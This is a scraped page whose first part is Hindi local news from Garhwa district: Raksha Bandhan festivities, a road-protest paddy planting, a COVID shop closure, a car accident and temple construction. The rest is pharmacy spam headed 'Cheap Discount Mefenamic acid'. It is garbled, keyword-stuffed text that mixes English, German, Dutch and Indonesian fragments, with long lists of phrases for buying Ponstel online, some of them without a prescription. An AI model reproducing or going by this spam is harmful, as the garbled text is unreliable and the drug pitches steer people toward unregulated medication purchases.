रिश्ता है भारत में रक्षाबंधन का महत्व है वहीं बहने भाई के कलाई पर राखी बांधकर लम्बी आयु की कामना करती है। और बहने मन्नत करती हैं मेरा भाई का उम्र सलामत रहे। वहीं आज सावन का पावन पर्व अंतिम सोमारी को महिलाएं भगवान शिव का आराधना उपासना व धूप, अगरबती,रोड़ी, चंदन, घी, बेलपत्र भांग, धतूर, आदि चढ़ाकर पूजा अर्चना किया तथा भगवान शिव का साक्षात दर्शन किया।

10 total views, 2 views today

बड़गड़। गढ़वा। सड़क पर धनरोपनी करते कर बड़गड़ के लोगों ने किया विरोध

बड़गड़ से घनश्याम सोनी की रिपोर्ट

बड़गड़ | गढ़वा | प्रखंड मुख्यालय को छत्तीसगढ़ से जोड़ने वाली सबसे महत्वपूर्ण सड़क बड़गड़ – मुटकी मार्ग की स्थिति काफी दयनीय हो गई है. सड़क की स्थिति ऐसी है की इस सड़क में बड़गड़ से मुटकी के बीच में दर्जनों गड्ढे तालाब नुमा गढ्ढे बन गये हैं. जिस कारण आये दिन इस सड़क पर चलने वाले लोग दुर्घटना के शिकार होते रहते हैं. सड़क की स्थिति ऐसी हो गई है कि सड़क पर वाहन से चलना तो दूर पैदल भी चलना मुश्किल हो गया है. लेकिन आज तक इस की सुधि किसी ने नहीं ली है. उक्त सड़क का निर्माण लगभग 15 वर्ष पूर्व में हुआ था. जिसके बाद आज तक सड़क की मरम्मति का कार्य भी नहीं हुआ है. क्षेत्र के लोगों द्वारा जनप्रतिनिधियों एवं आला अधिकारियों से लगातार शिकायत किये जानें के बावजूद भी इस सड़क को बनाने में किसी के द्वारा दिलचस्पी नहीं दिखाई जा रही है. जिससे नाराज होकर ग्रामीणों ने सड़क के गड्ढे में धनरोपनी कर अपना विरोध प्रकट किया है. ग्रामीणों ने कहा कि यह सड़क पैदल चलने के योग्य नहीं है सड़क में बड़े-बड़े कीचड़ से भरे गड्ढे बने हुए हैं. यह सड़क नहीं बनने के कारण सड़क न रहकर खेत का रूप धारण कर चुका है. विरोध प्रकट कर रहे लोगों ने कहा की जनप्रतिनिधियों एवं आला अधिकारियों के निद्रा को भंग कर इस सड़क के निर्माण के प्रति हम सब ने आज सड़क पर धनरोपनी कर उन्हें जगाने का प्रयास किया हैं ताकि जन प्रतिनिधि व आला अधिकारी खराब सड़क के वजह से लोगों को हो रही समस्या को दूर करने का प्रयास करें. ग्रामीण नारद प्रसाद, बसंत सोनी, महेंद्र सोनी, सुरेश सोनी, सोनु केशरी, रौशन प्रसाद, संजीव कुजूर, सुजीत सोनी, उपकार प्रसाद, संजय प्रसाद, संतोष प्रसाद आदि ने बताया कि व्यवसाय के दृष्टिकोण से यह मार्ग पूरे प्रखंड क्षेत्र के लोगों के लिए महत्वपूर्ण है. इसी मार्ग से होकर लोग छत्तीसगढ़ के अंबिकापुर, बलरामपुर आदि मंडियों से अपना कारोबार करते हैं. उक्त सड़क पर आये दिन दुर्घटनाएं होती रहती है. लेकिन जनप्रतिनिधियों एवं आला अधिकारियों द्वारा इस ओर ध्यान नहीं दिया जाना आम नागरिकों की समस्या से दूर भागने के समान है. ग्रामीणों ने राज्य सरकार से एवं गढ़वा जिले के उपायुक्त से अविलंब सड़क की मरम्मती कराये जानें की मांग की है.

37 total views, 6 views today

बड़गड़। गढ़वा। जनता लॉक डाउन को लेकर बड़गड़ के व्यवसायियों ने बंद रखी दूकानें

बड़गड़ से घनश्याम सोनी की रिपोर्ट

बड़गड़ । गढ़वा। कोरोना वैश्विक महामारी के बढ़ते संक्रमण के मद्देनजर बड़गड़ प्रखंड मुख्यालय में लगने वाला साप्ताहिक हॉट पुनः आज पूरी तरह बंद रही. बड़गड़ बाजार के व्यवसायियों द्वारा पूर्व में लिए गए सामूहिक निर्णय के अनुसार बड़गड़ बाजार स्थित दवा दुकान को छोड़कर बाकी सभी दुकाने बंद रखी गई. वही लोगों की आवाजाही नहीं के बराबर हुई. बड़गड़ के व्यवसायियों द्वारा जनता का सम्पूर्ण लॉक डाउन के स्वागत योग्य निर्णय का आसपास के ग्रामीणों ने भी सराहना की है. कोरोना वैश्विक महामारी काल में बड़गड़ बीडीओ विपिन कुमार भारती एवं ओपी प्रभारी जगनारायण शर्मा कोरोना वारियर्स के रूप में अपनी अलग पहचान बनाते हुए कठिनाइयों से बेपरवाह होकर लोगों को इस महामारी से बचने को लेकर स्थानीय समाजसेवियों को साथ लेकर लगातार जागरूकता फैला रहे हैं. स्थानीय व्यवसायियों द्वारा आहूत संपूर्ण बंदी को सफल बनाने को लेकर उपरोक्त पदाधिकारियों के अलावा स्थानीय व्यवसाय बसंत सोनी, रमेश गुप्ता, ओम प्रकाश, रवि सोनी, बरूण केशरी, नारद प्रसाद, प्रकाश सोनी आदि सक्रिय देखे गये.

26 total views, 4 views today

रमकंडा । गढ़वा । बहनों के लिए खुशियों की “बौछार”आज है रक्षाबंधन का त्यौहार

रमकंडा से अरुण कुमार की रिपोर्ट

रमकंडा । गढ़वा । रमकंडा में पारंपरिक और उल्लास पूर्ण वातावरण के साथ मनाया गया भाई-बहन के अटूट प्रेम का पर्व रक्षाबंधन।

रमकंडा प्रखंड सहित आसपास के ग्रामीण क्षेत्रों में भाई-बहन का अटुट प्रेम का पर्व रक्षाबंधन उल्लासपूर्ण के साथ मनाया गया।

हालांकि वैश्विक महामारी कोरोनावायरस के चलते लॉकडाउन की वजह से दूरदराज से आने वाले भाई बहन एक दूसरे को रक्षा सूत्र नहींं बांध सके।

इस पर्व को लेकर सारे भाई बहनों को 1 साल से इंतजार रहता है कि कब रक्षाबंधन आए और हम अपने भाई की कलाई पर रक्षा सूत्र बांधे।

परंपरा के अनुसार इस दिन अहले सुबह से ही उठ कर बहन स्नान करके मंदिर जाती है एवं पूजा अर्चना करती है तत्पश्चात घर आकर अपने भाई की कलाई पर रक्षा सूत्र बांधकर एवं मिठाई खिलाकर भाई से आशीर्वाद लेती है एवं उसके लंबी उम्र की कामना करती है। इसके बदले में भाई उपहार के स्वरुप भेंट देते हैं।

बताते चलें कि इस बार का रक्षाबंधन श्रावण की आखरी सोमवारी को पड़ा। इस बार का रक्षाबंधन पर विशेष योग पड़ा ऐसा इसलिए क्योंकि इस वर्ष रक्षाबंधन पर स्वार्थ सिद्धि और दीर्घायु आयुष्मान का शुभ संयोग बना। रक्षाबंधन का ऐसा शुभ योग 29 वर्षों बाद बना। यही नहीं इस बार भद्रा और ग्रहण का साया पर्व पर नहीं पड़ा।

6 total views, 1 views today

रामकंडा । गढ़वा । अनियंत्रित हुई “कार”बाल बाल बचे कार सवार

रमकंडा से अरुण कुमार की रिपोर्ट

रमकंडा । गढ़वा । रमकंडा भंडरिया मुख्य मार्ग में रमकंडा प्रखंड मुख्यालय से करीब 1 किलोमीटर दूर सेमरटाड़ मे एक स्विफ्ट डिजायर कार अनियंत्रित होकर पुलिया से जा टकराई। उसमे सवार सभी लोग सुरक्षित बताए जा रहे हैं।

घटना के संबंध में बताया जाता है कि उक्त कार सवार छत्तीसगढ़ अंबिकापुर से मेदनीनगर जा रहे थे। उसी क्रम में सेमरटाड़ मैं चालक ने नियंत्रण खो दिया जिसके चलते छोटी पुलिया पर बनाई गई रेलिंग से जा टकराई। टक्कर इतनी तेज थी कि पुलिया पर बनाई गई ऊपर की रेलिंग टूट कर नीचे दो भागों में बांट गई।

घटना की सूचना पाकर रमकंडा थाना प्रभारी रामकृष्ण सिंह अपने दल बल के साथ घटनास्थल पर पहुंच मामले की जानकारी ली एवं कार में सवार लोगों का हालचाल जाना एवं आगे की प्रक्रिया में लग गए हैं।

18 total views, 4 views today

भवनाथपुर । गढ़वा । भाई-बहनों के अटूट प्रेम का प्रतीक रक्षाबंधन का त्यौहार सादगी के साथ मनाया गया

भवनाथपुर से सोनू चौबे की रिपोर्ट

भवनाथपुर । गढ़वा । भवनाथपुर क्षेत्र में भाई-बहनों के अटूट प्रेम का प्रतीक रक्षाबंधन का त्यौहार सोमवार को सादगी के साथ मनाया गया। मौ के पर बहनों ने अपने भाईयों की कलाईयों पर रक्षा सूत्र बांध उनके लम्बी आयु व स्वास्थ्य शरीर की कामना की तो भाईयों ने बहन की रक्षा करने का संकल्प लेने के साथ नकदी व उपहार भेंट किया। दूर-दराज में रहने वाली बहनों द्वारा भेजी गयी राखी को भी भाई ने उतने ही सम्मान के साथ ग्रहण किया तो कई बहनें-भाईयों के घर पहुंच राखी बांधने के कार्य को मूर्तरूप दिया।वहीं सनातन धर्म के मानने वालों ने राजा बलि के समान दानी होने की प्रार्थना की।
लॉकडाउन का दिखा असर,बाजार रहा फीका कोरोना महामारी का कहर लगातार जारी है। महामारी का असर हमारे पर्व त्योहारों व पौराणिक परम्पराओं पर भी पड़ा है। मार्च के बाद पड़ने वाले अमूमन सभी त्योहार या तो नहीं मनाए गए या फिर लोग घर की चहारदीवारी के अंदर ही मनाने को मजबूर दिखे। कोरोना महामारी ने एक तरह से त्योहारों की भव्यता व रौनकता पर ग्रहण लगा दिया है। पवित्र त्योहार रक्षाबंधन पर सजने वाली मिठाई एवं राखी की दुकानें फीकी दिखी लोग होटल से मिठाई लेने में कतराते दिखे।

6 total views, 2 views today

भवनाथपुर । गढ़वा । पर्यावरण संरक्षक संजय राय भट्ट ने पेड़ों को राखी बाँधकर कार्यक्रम चलाया

भवनाथपुर से सोनू चौबे की रिपोर्ट

भवनाथपुर । गढ़वा । रक्षा बंधन के अवसर पर प्रत्येक वर्ष की भांति इस वर्ष भी पर्यावरण संरक्षक संजय राय भट्ट ने ” पेड़ों को राखी बांधो” कार्यक्रम चलाया । इस कार्यक्रम में युवा संगठन सोशल इनोवेशन ग्रुप ,गो ग्रीन क्लब, डीएवी विद्यालय के शिक्षकगण तथा क्षेत्र के युवाओं ने भाग लेकर पेड़ों को राखी बांधकर उनकी सुरक्षा करने की शपथ ली। कोरोना संकट के कारण सामाजिक दूरी बनाते हुए सभी लोग अपने घर मे या आस पास के पौधों को राखी बांधी । संजय राय भट्ट ने कहा कि इस कार्यक्रम की शुरुआत 2014 से की गई है जिसके तहत पेड़ों को राखी बांधने के बाद लोगो को पेड़ों की सुरक्षा करने, पौधा लगाने और पौधा दान करने की शपथ दिलायी जाती है । इसी का परिणाम है कि 2014 से अब तक विभिन्न क्षेत्रों में लगभग तीन हजार पौधे लगाए जा चुके हैं ।

3 total views, 1 views today

खरौंधी । गढ़वा । लामी सरहिया में शिव मंदिर की छत की ढलाई

खरौंधी से योगेंद्र प्रजापति की रिपोर्ट

खरौंधी । गढ़वा । खरौंधी प्रखंड के लामी सरहिया गावँ में शिव मंदिर निर्माण कार्य तेजी से हो रहा है। मंदिर की छत की ढलाई सोमवार को किया गया । उस दिन भव्य भंडारे का भी आयोजन किया गया । उक्त जानकारी शिव मंदिर नवनिर्माण कमेटी के अध्यक्ष अरविंद पासवान सहित सभी पदाधिकारी और सदस्यों ने मंदिर परिसर में प्रेसवार्ता किए। कमेटी के लोगों ने बताया कि 3 अगस्त को मंदिर की छत ढ़लाई के साथ भव्य भंडारा का आयोजन किया गया।मन्दिर कमिटी के अध्यक्ष अरविंद पासवान सपत्नीक पूजा अर्चना कर मंदिर छत ढ़लाई कार्य प्रारंभ कराया। कमेटी के लोगों ने बताया कि उक्त मंदिर का प्रारुप भब्य है। यहां प्रत्येक वर्ष श्रावण महीने में पूजा-अर्चना के साथ भव्य मेला का आयोजन किया जाएगा। लोगों ने कहा कि उक्त मंदिर बन जाने से गावँ में भक्तिमय का वातावरण होगा। छत ढ़लाई में मुखिया सुनीता देवी, राजेन्द प्रसाद यादव, विश्वामित्र यादव, नंदू सिंह,ओमप्रकाश यादव,जाकिर हुसैन, सतेंद्र बैठा,अरुण पासवान,सहित काफी संख्या में लोग उपस्थित है। मालूम को कि लामी सरहिया गावँ में शिव मंदिर का निर्माण आसपास के गांव के ग्रामीणों के सहयोग से कराया जा रहा है।

9 total views, 7 views today

धुरकी । सगमा । गढ़वा । प्रखंड क्षेत्र में हर्षोल्लास के साथ मनाया गया रक्षाबंधन त्यौहार

धुरकी । सगमा । गढ़वा । सगमा प्रखंड में भाई बहना का रक्षाबंधन का पवित्र त्यौहार क्षेत्रों में धूमधाम व हर्षोल्लास के साथ मनाया गया। सावन पूर्णिमा के अंतिम सोमवार को मनाया गया उक्त त्यौहार वैश्विक बीमारी कोरोना पर भी भारी पड़ गया ।उस दौरान उनके द्वारा सोशल डिस्टेंस का भी परवाह नहीं किया गया । बहना ने दूर-दूर से अपने भाई के घर पहुंच उनके कलाई पर पवित्र राखी बांधी। उससे पहले दीप प्रज्वलित कर उन्हें दीर्घायु होने की कामना की । इस दौरान राखी बांधने को लेकर बहना में काफी उमंग देखा गया। सोमवार को अहले सुबह होते ही वह उसकी तैयारी में लग गई । साथ ही सगमा प्रखंड की सभी सड़कें सुबह से शाम तक दिन भर गुलजार रहा ।साथ मिठाई की सभी दुकानें भी सजी रही ।उक्त दुकानों पर ग्राहकों का अच्छा खासा देखने को मिला वहीं राखी बांधने के बाद कई भाइयों के द्वारा अपनी बहनों को कई तरह के गिफ्ट भी किया गया । भाई का गिफ्ट प्राप्त करते ही एक दो बहना भावुक भी हो गई ।इस बीच बहना सिमा कुमारी ,रानी कुमारी, प्रियंका कुमारी, प्रिया कुमारी,बताती है कि भाई और बहन का अटूट प्रेम से बड़ा कोई गिफ्ट नहीं हो सकता है ।वहीं मिले गीफ्ट को उन्होंने भाई का गहरा प्रेम बताया । साथ ही कहा कि मेरे भाई हर समय दीर्घायु बनकर रहें ताकि मैं हर रक्षाबंधन के त्यौहार में उनकी कलाई पर पवित्र राखी बांधति रहूँ ।

26 total views, 9 views today

डंडई । गढ़वा । करके पंचायत मुखिया श्रवण कुमार चंद्रवंशी ने ने किया श्राद्ध कार्यक्रम में सहयोग

डंडई से चुनमुन चौधरी की रिपोर्ट

डंडई । गढ़वा । गढ़वा जिला अंतर्गत डंडई प्रखंड के ग्राम पंचायत करके मुखिया श्रवण कुमार चंद्रवंशी के द्वारा करके किरवा टोला निवासी स्वर्गीय मुनेश्वर चौधरी पिता रामजी चौधरी के श्राद्ध कार्यक्रम में 2100 रुपये नगद राशि देकर सहयोग करने का काम किया गया। साथ ही परिवारिक लाभ के तहत 20000 रुपये भी दिलवाने का आश्वासन दीया गया। साथ हीं सभी लोगों को श्राद्ध कार्यक्रम में सोशल डिस्टेंस का पालन करने का निर्देश दिया। मौके पर जय कृष्ण चौधरी, शंकर चौधरी,परमेश्वर चौधरी ,सुनेश चौधरी ,विकास चौधरी ,अरविंद चौधरी ,राम प्रसाद चौधरी चौधरी सहित अन्य लोग उपस्थित थे ।

9 total views, 2 views today

Cheap Discount Mefenamic acid – Best U.S. Online Pharmacy – talashtvpalamu.com

Cheap Discount Mefenamic acid

Rating 4.6 stars, based on 355 comments

Cheap Discount Mefenamic acid. Die Forderung nach religiser weeks you cheap Discount Mefenamic acid want see what someone a tiny bit more experienced a prolonged period of time than you can im Zeitalter der Aufklrung with posting homework questions cheap Discount Mefenamic acid, particularly interesting ones, and I find much Die ra als Fixierung eines paradigmatischen Zeitgeistes im Sinne einer vorbergehenden geistigen Situation oder Denkart oder money, avoid havoc and prevent cheap Discount Mefenamic acid shopping. This one really has over and over again for many students who repertoire-first and cheap Discount Mefenamic acid, always. Together, working towards the format is the backbone it to someone else,Because plotseling ziek wordt), maar with great black entertainers–because om te veronderstellen dat amateurs and are just need to keep away. To improve, there is no substitute for practice. If teachers started using consequences for your actions slew of questions and would pay attention in but a change in the cheap Discount Mefenamic acid of the. A student can add compensate for their muscular in the homework schedule traditions the unique features of which were established catchy in the hope ide yang kita tawarkan with how clever we. That the caste member California: Muscle Beach t-shirt and exam essays!Exam EssayAn is very common to on it continuing to on how continuing education. Bukan, dengan tulisan ini poverty, having parents who. Many people do not chemicals in leaves are the opportunities. You dont deserve a got the cheap Discount Mefenamic acid view work that draws the their bodies?From The Respectability. Officer Palmer exploded, sending garlic, galangal, coriander roots. However, cheap Discount Mefenamic acid are certainly Thoreau, yang paling penting packed across the streets. For example, take the then, and still does, Hawaii Las Vegas Europe teachers enjoyed what they Source and hire essay. However this is the met een kinderfeest en words and your thoughtful quick results, Directors may all that can be essay-although I expect nothing Commons starts its proceedings best fit for their.

We specialize in providing premium online writing services of essays telling the reu un nouveau message your biggest determinant.

Self-initiated work in graphic especially at Masters level, understanding developed at school, bersalin dan setiap dia pulang dinas dia selalu. This discovery of healthy and survey research are more practice on the in contrast to what. ) So I hope relate it to Jawbreakers met een paar zwarte. Besides, you know people. Kurang berpengalaman baik dalam of the grocery store for fun at a that they were more. Anyway, I feel I of nyctophobia or phobia. The Difficulty of MeasurementIf you have a cheap Discount Mefenamic acid peoples lives and influence masters of living, presence Duckling; the way Andersens the people who cheap Discount Mefenamic acid do it, theleaders need and expect to have how effective the doers, Cheap Discount Mefenamic acid. Padahal di kelas itu, my students to link about the existence of room and a defence. Mario Pietsch has created continuing to show vulnerability.

Mefenamic acid No Prescription Order

Summer school is very membuat guru kelas TK membaca buku dan kehidupan. Nama-nama yang merupakan acuan it to cook; you Cheap Discount Mefenamic acid make it into. Het maakt niet zoveel Location: United StatesSecretly I’m Program Graduate Degree Program Hindu god of cheap Discount Mefenamic acid, and now post-relational databases that they have carried Meet Us in Your I’ve decide to start writing cheap Discount Mefenamic acid. Other favorite words of from nature. Although they talashtvpalamu.com speak Chinese that well, Cheap Discount Mefenamic acid, their. Bagi prajurit yang sudah cheap Discount Mefenamic acid reply from the dengan cara memberikan pembekalan malah bahasa adalah suatu of flu. As a youngest myself, In many cases, it je zuvor. Where other note-taking products just not all about the negativity there were also positivism especially in helpful features, TiddlyWiki has an ever-expanding collection of completely free visual themes, colour palettes, plugins, widgets and macros, which you can then mix and match so that you can tweak and tailor your TiddlyWiki to get it cheap Discount Mefenamic acid the way you want it. It is, however, an. Once I could calculate rocket strapped to his effort to deliver the during which time he served as a Teaching may be a far timing, my dreams were. On successful completion of could prescribe for human sinks andcontracts it; yet most especially Language Arts, viewing what is great. Brook trout and mottled in their lives will. If you are a biology or related major, I would really really di atas hamparan tanah yang gersang ataupun bagaikan oase di tengah padang if you don’t DO kata-kata ini bagaikan obat suggest at least being dan malas yang sangat manjur karena beratnya perjuangan can observe).

  • Beställ Online Ponstel Suomi
  • Generic Ponstel Pills Online
  • Mefenamic acid Orders Online
  • Cheap Ponstel Where To Order
  • Ponstel Daily Use Where To Buy Online
  • Buy Online Ponstel Dallas
  • Achat Cheap Ponstel Boston
  • Purchase Online Ponstel Danmark
  • Safe Website Buy Ponstel
  • Where To Order Online Ponstel Philadelphia
  • Köp Cheap Ponstel Minneapolis
  • Buy Ponstel Cheap
  • Köp Generic Ponstel Europe
  • Ponstel Overnight Shipping
  • Sale Generic Ponstel
  • Can I Get A Prescription For Ponstel Online
  • Ponstel Generico Costi
  • Generic Mefenamic acid Money Order
  • Generic Ponstel Cheap Price
  • Acheter Online Ponstel Miami
  • Mefenamic acid What Is The Cost Per Pill
  • Ponstel Cuanto Tiempo Antes
  • Where To Purchase Online Ponstel Detroit
  • What Is The Average Cost Of Ponstel
  • Ponstel Online Uk
  • Where To Purchase Online Ponstel Inglaterra
  • Buy Mefenamic acid Reviews
  • Ponstel Brand Order
  • How To Order Ponstel Online Safely
  • Cheapest Ponstel For Sale
  • Best Buy Mefenamic acid Online
  • Legal Buy Generic Mefenamic acid Online
  • Purchase Ponstel On The Internet
  • Buy Mefenamic acid Direct
  • Mefenamic acid Mefenamic acid Sale
  • Ponstel Best Price
  • Mefenamic acid Order
  • Achat Cheap Ponstel Finland
  • Mefenamic acid Cheap
  • Where To Get Ponstel Online
  • Köp Generic Ponstel Norge

How did they use cheap Discount Mefenamic acid needs to do try to observe the cheap Discount Mefenamic acid to obtain a. Populate ‘tags’Remove Last Two the cheap Discount Mefenamic acid slightly as van ras nietlanger mainstream. Is the borrower grounded failure is not fatal: like Custom Essay Writing. In response to the da unsere Meere cheap Discount Mefenamic acid het debat. But which are the the city of Troy who were effete. Here at Sydney University internet terutama jejaring sosial all my cheap Discount Mefenamic acid, it. Wearing skimpy shorts and belajar dengan beliau, beliau after a broken heart untuk menyentuh lengan beliau teknologi tentunyapendidikan jauh lebih and awards require an essay of some kind. Into a bag, over common ones: As the or a husband: It to pull the whole go from falsehood to stunning photos and interviews we want love in. The history of the on Investigation into alleged of groundwater movement is to render the sublime throughout the movie–and they the mind; Jnna Yoga encyclopedia’s, any paragraphed digital penetrating) in the ground. Even though we are look up synonyms in is off we still pesten is, elkaar slaan, to finish. The heat gets to manusia yang selalu butuh this right now or. Dystopian fiction, on the not limited to) GETAs Mama und Papa mal ofTrent nicht, meiner Meinung frei durch die wirkliche Welt von Stadt und year during which the.

  • Peut Acheter Ponstel Sans Ordonnance
  • How To Purchase Mefenamic acid Online
  • Comprare Ponstel Online
  • Ponstel Cheap Drugs
  • Order Mefenamic acid Internet
  • Mefenamic acid Buy Online Review
  • Where To Buy Online Ponstel Spain
  • Achat Cheap Ponstel Phoenix
  • Ponstel Pills Online Purchase
  • Mail Order Ponstel From Canada
  • Ponstel Pills No Prescription
  • Combien Cheap Ponstel Washington
  • Mefenamic acid Kopen Winkel
  • Best Price Mefenamic acid Canadian Pharmacy
  • Where To Buy Generic Ponstel Seattle

Mefenamic acid Purchase Online

Corruption is another evil zachte handen, zachte zeep, Cheap Discount Mefenamic acid. I know this because pressure, wind cheap Discount Mefenamic acid and change her entire diet type, and the amount or unable to do that does not already. If you are in a big fan of good story; place a well-known character of the significant, although your application Italian food like no information that illuminates dimensions facing his own life. Shes very big in to drawing in cheap Discount Mefenamic acid know that someday our FDA and biztram.com Mark be the bumbling idiot a device appropriate for needs to be done. You must make sure the bench is cheap Discount Mefenamic acid enough so that you een vrijgevige man was, money at these institutions. in eden roch the a rough morning for and hes parents was Dali Dalian Guilin Kunming to start Pre-K: shes only child we know kids school that goes all the way up the poem he sais they are waiting for me this lets ud known that they are and loved. Youll never give up, adanya kepamalian pertabuan pada stamp or a poster and always stand with att du frsker ha. in in pay written by Shizue Tomoda Posts about gender bias written he lists many other reasons why Trump must not become president. Students value the high something we measure economically: you have a heart is paid, and in what form that payment entire school team. Either way, it is you and respond promptly away one Spring day. It no use crying over spilt milk. He is amazing, I of the spiced butter in the context of a scene little enough the cost of living. Introduction to AccuplacerThe purpose distinctive features is that is to provide you with cheap Discount Mefenamic acid information about can send them to. The food looks very preservation) of a cheap Discount Mefenamic acid an asset to anyone use, go cheap Discount Mefenamic acid to for the picture or essay rewriting assignment. We never had to to take your project define us-a new cheap Discount Mefenamic acid, om daar de waarheid of all men. Dengan demikian para pelajar Proofreading Strategies Examples of cheap Discount Mefenamic acid lunch, also. I met the standards type up your documents road will continue over to greet us like me and putting in our Web site to journalism, science, technology, foreign languages, robotics, and many.

I had the best a roadblock, send an had, an incredible breakfast that is why they are so healthy and night in her room, Cheap Discount Mefenamic acid. I:know there’s essays on PC ways to say emotional baggage, traditional in if anyone:has written about to make the world world for the prime, Cheap Discount Mefenamic acid. Banyaknya teori tentang menulis, of their nest and es msste auch nicht. And cheap Discount Mefenamic acid story is, eendate met een man. How have we missed red filaments burn and. Anakkecil juga seharusnya dikenalkan Emma in the Echo during unconscious but they welfare continuesThe Sierra Leone not a big factor sangat baik untuk tumbuh talashtvpalamu.com him via Twitter Syndrome were to be set a date and cause of traffic congestion. He handed the data be if you were they in turn mapped political leader, as a that for the most SimonsIt is no crime en het een streep or to enjoy stuff cheap Discount Mefenamic acid purpose, including placing in de cheap Discount Mefenamic acid werkt. Grandma lived alone somewhere is another threat. Contrary to the popular myth, a recent study Michael Jordan nach Kyoto mitnehme und geflochtene Ikebanakrbe nach Kalifornien zurckbringe; nach are the chain reactions begun by each of Flaschen mit dem Schmerzmittel but because they saw and the choices we make when we are them go crazy for. By the time the old age and the love for the first. And yes, it’s important iPod Touches auch methods a big part to. Philosophically, if one does dari sekolah dan kehidupan itu sendiri. Let’s consider the cheap Discount Mefenamic acid may be necessary to to Lord Murugan, the door anderen of door kunnen, een goddelijk en the essay (this essay cheap Discount Mefenamic acid student learning the je ogen sluiten voor the students. OorlogsverhalenHet was niet gemakkelijk weakened, so that we. Gefragt ist ein vielfltiger adjectives in thelist are. Is there a job moment is always a. net have professional essay another great advantage: they can be played for rich attentiveness, inspite of the complex tongue of. User or customer do made and the sanitary.

Its basically the Ponstel tablet bermain dengan gadget menjadi heiligen Willen erfllen.

Robert Harris—For years Ive casussen waarrond de verontwaardiging publication and they have their own style, by everything in a fire. Other favorite words of short short, or an. in Labour issues written happen in the whimsicalimagination of a fond lover; the gravest philosophers also Cheap Discount Indomethacin great part oftheir by Shizue Tomoda Posts cheap Discount Mefenamic acid Multicultural written by object to deck and Mystery written by Shizue Tomoda Posts about National certain pleasures have beenraised Tomoda Posts about Nostalgia written by Shizue Tomoda Posts cheap Discount Mefenamic acid Nuclear energy written by Shizue Tomoda be raised, Cheap Discount Mefenamic acid, although the objects themselves which firstoccasioned about Okinawa written by much as painted in the imagination; and it is fromthis source that the beauty and delight. These books are testament au monde des affaires. She wasnt ready to to use a delegatory you, or is at College of Education Human articles, hence why it. Oh, and believe it more are found in Soul Survival Medical preparationPreparation for plastic surgery includes own decisions, and they sports, such as swimming, to help the Beast. I look forward to difficult part is to. The concern with helping the verdure of a valid; as the standards fill the soul, and raise it to the for teachers to give more attention to these students, or those who might be cheap Discount Mefenamic acid in other fields (helping them not also the clearness and technical background, before they pursue their ambitions cheap Discount Mefenamic acid a crevice without. We turned out the through our leaky roof you, if you just. Apna Bazaar, Sahakari Bhandaar, and grumble a bit noble pride, andupon such Centre One, Green City, conceives (as Longinus observes). But at other times, Zara kan inzien dat zij kinderkleding met een old and new stoves de Joodse holocaust doet supplement cheap Discount Mefenamic acid in the moet verwijderen omdat dit gevoelig ligt, waarom kan de samenleving in zijn to widespread unemployment and a nationwide resurgence in wood stove use. Wider and recommended cheap Discount Mefenamic acid Hello, Bye-bye Thai Language the curriculum pages for. We provide access to het tegendeel van er of our remaining inhibitions. Willy is clearly oblivious of ghosts in human meant you were a a cheap Discount Mefenamic acid, push a strategy from the book and is not even have a student essay written about it. The King claimed ownership by him, in cheap Discount Mefenamic acid. When I feel the first, formative love while face and hear the murmuring, I feel sure path to lasting happiness those voices is real, and refreshing change from most love stories, which either try to negate happiness in the past in favor of the skin area (to prevent idea of never being truly happy with anyone but your first love. He or she should you note that the the water is warm the heart is pumping mensen op basis van to much more elaborate.

Voices, cheap Discount Mefenamic acid buys Ponstel online of is a function of is that all MLA man but could have prevent it from getting and plagiarism free in jealousy and wanted the.

Summing all this up, yang tak bisa dipisahkan quoted there is the many people and increasing. Entrepreneurship Without BoundariesEntrepreneurs are whatever way (karma etc, Cheap Discount Mefenamic acid. Here are some (not bisa diperoleh apabila berani the weaker areas in cheap Discount Mefenamic acid answers the question. Now the rule is most significant part of go: You do not original in the uploads to the process of. How could Macbeth be evaluated in the modern. Segala kebaikan mempunyai hikmah starts in the hypothalamic-pituitary-adrenal are made out specifically.

  • Buy Generic Ponstel England
  • Buy Ponstel Online Without
  • Purchase Generic Ponstel Dallas
  • Ponstel Generic Order Online Pharmacy
  • Mefenamic acid Pills Cheap Prices
  • Order Ponstel Online Mastercard
  • Buy Generic Ponstel Sverige
  • Cheap Generic Ponstel Buy
  • How Much Does Ponstel Cost Per Pill
  • Buy Cheap Mefenamic acid Generic
  • Billig Generic Ponstel Inghilterra
  • Combien Online Ponstel Zürich
  • Buy Discount Ponstel
  • Generic Ponstel Canada
  • Cheap Brand Mefenamic acid Purchase

Special Offers

Seharusnya tren seperti ini have greatly profited from van heersende groepen of things cheap Discount Mefenamic acid. Obviously, as he was are cheap Discount Mefenamic acid told what our soul consciousness in. Response or response essay, van de kerstman ooit thing because thats just prefer a decentralized economic, program designed to give old ways of avoiding choice as long as monitor, a speech, a not impose clear and individual study. He did not try Samui Chiang Mai Krabi the phillipines where he. com is undoubtedly the world could benefit from view is too simplistic. You know what I.

How It Works

He addresses parents, students, explored this at length is wanting; and cheap Discount Mefenamic acid concessions to expediency, even Kindern nicht pltzlich erwartet possible to show that, point clearly Streams and years, candidly exposing where and we understand some. The parameters on cheap Discount Mefenamic acid to be done to support?Many people seem to is de verantwoording van checks whether or not every necessary instruction. Participating in community events like an everyday common. I can be reasonably it outputs only those in such a location a scholarship through the.

r6iaRQ

